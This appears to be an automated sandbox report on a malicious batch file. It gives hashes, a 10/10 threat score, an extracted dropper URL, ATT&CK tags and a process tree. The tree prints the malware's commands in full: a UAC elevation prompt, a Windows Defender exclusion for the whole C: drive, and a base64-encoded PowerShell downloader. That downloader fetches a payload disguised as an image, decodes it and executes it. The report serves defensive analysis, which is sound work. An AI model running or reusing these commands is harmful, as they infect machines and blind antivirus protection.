4d5a2a643cdab50f0105e110a8187cd812a7ebbc7d903b8a8029cd3508094f32

General

Target

t.cmd
Size

1KB
MD5

c3a80dbc5b98aac01cc124b59ec52d7e
SHA1

eae4d2a89be841042839e8bfeca7480a2ba327e4
SHA256

4d5a2a643cdab50f0105e110a8187cd812a7ebbc7d903b8a8029cd3508094f32
SHA512

addf559ed04d9cbaccdc25d87940c0c0af41e183087c9c956bab438b7cf755a7481aa88d534792c265ace9491302ae81343de77d4c93101a232d44d47500d5a9

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://i.imghippo.com/files/Zf9637kKg.jpg

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
2740	powershell.exe
1616	powershell.exe
2752	powershell.exe
2528	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2752	powershell.exe
2740	powershell.exe
2740	powershell.exe
2740	powershell.exe
2528	powershell.exe
2980	powershell.exe
1616	powershell.exe
2864	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2752	powershell.exe
Token: SeDebugPrivilege	2740	powershell.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	2864	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2764 wrote to memory of 2752	2764	cmd.exe	32
PID 2764 wrote to memory of 2752	2764	cmd.exe	32
PID 2764 wrote to memory of 2752	2764	cmd.exe	32
PID 2764 wrote to memory of 2740	2764	cmd.exe	33
PID 2764 wrote to memory of 2740	2764	cmd.exe	33
PID 2764 wrote to memory of 2740	2764	cmd.exe	33
PID 2740 wrote to memory of 2660	2740	powershell.exe	34
PID 2740 wrote to memory of 2660	2740	powershell.exe	34
PID 2740 wrote to memory of 2660	2740	powershell.exe	34
PID 2660 wrote to memory of 2528	2660	cmd.exe	36
PID 2660 wrote to memory of 2528	2660	cmd.exe	36
PID 2660 wrote to memory of 2528	2660	cmd.exe	36
PID 2660 wrote to memory of 2980	2660	cmd.exe	37
PID 2660 wrote to memory of 2980	2660	cmd.exe	37
PID 2660 wrote to memory of 2980	2660	cmd.exe	37
PID 2980 wrote to memory of 1616	2980	powershell.exe	38
PID 2980 wrote to memory of 1616	2980	powershell.exe	38
PID 2980 wrote to memory of 1616	2980	powershell.exe	38
PID 2660 wrote to memory of 2864	2660	cmd.exe	39
PID 2660 wrote to memory of 2864	2660	cmd.exe	39
PID 2660 wrote to memory of 2864	2660	cmd.exe	39

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\t.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2764
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -w h -command ""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2752
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\t.cmd' -ArgumentList 'am_admin'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\t.cmd" am_admin
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2660
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w h -command ""
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2980
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1616
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enc JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGkALgBpAG0AZwBoAGkAcABwAG8ALgBjAG8AbQAvAGYAaQBsAGUAcwAvAFoAZgA5ADYAMwA3AGsASwBnAC4AagBwAGcAIgA7ACQAcABhAHQAaAA9ACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABPAG4AZQBEAHIAaQB2AGUAIgA7AG0AawBkAGkAcgAgACQAcABhAHQAaAAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AGkAdwByACAAJAB1AHIAbAAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABwAGEAdABoAFwAYgB1AGQAZAB5AC4AagBwAGcAIgA7AFsASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAVABlAHgAdAAoACIAJABwAGEAdABoAFwATwBuAGUARAByAGkAdgBlAC4AYwBtAGQAIgAsAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAZwBjACAAIgAkAHAAYQB0AGgAXABiAHUAZABkAHkALgBqAHAAZwAiACAALQBSAGEAdwApACkAKQApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAJABwAGEAdABoAFwATwBuAGUARAByAGkAdgBlAC4AYwBtAGQAIgA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
6d8ccabe8e6626f2e16aa35916731b51

SHA1
c33d25a35fb88cffcd4e11ed7c90b060785c559c

SHA256
de3a5cc466646cbff5f084fe20d5e8addd0cff4925f0b391dc57594a3a9ec8e7

SHA512
c4da3e84b7fc8051167c47a063ae9cf1741cf887d7e9a975cd9ca7b1365625478ef12c43580bff2aeb809a7d26d4b916c280a8d73d6ebfcf95b1c2cb1503823e

Download Submit
memory/2740-14-0x00000000029C0000-0x0000000002A40000-memory.dmp

Filesize
512KB

Download
memory/2740-15-0x000000001B550000-0x000000001B832000-memory.dmp

Filesize
2.9MB

Download
memory/2740-16-0x00000000027A0000-0x00000000027A8000-memory.dmp

Filesize
32KB

Download
memory/2752-4-0x000007FEF5BCE000-0x000007FEF5BCF000-memory.dmp

Filesize
4KB

Download
memory/2752-5-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/2752-6-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/2752-7-0x0000000002CD4000-0x0000000002CD7000-memory.dmp

Filesize
12KB

Download
memory/2752-8-0x000007FEF5910000-0x000007FEF62AD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing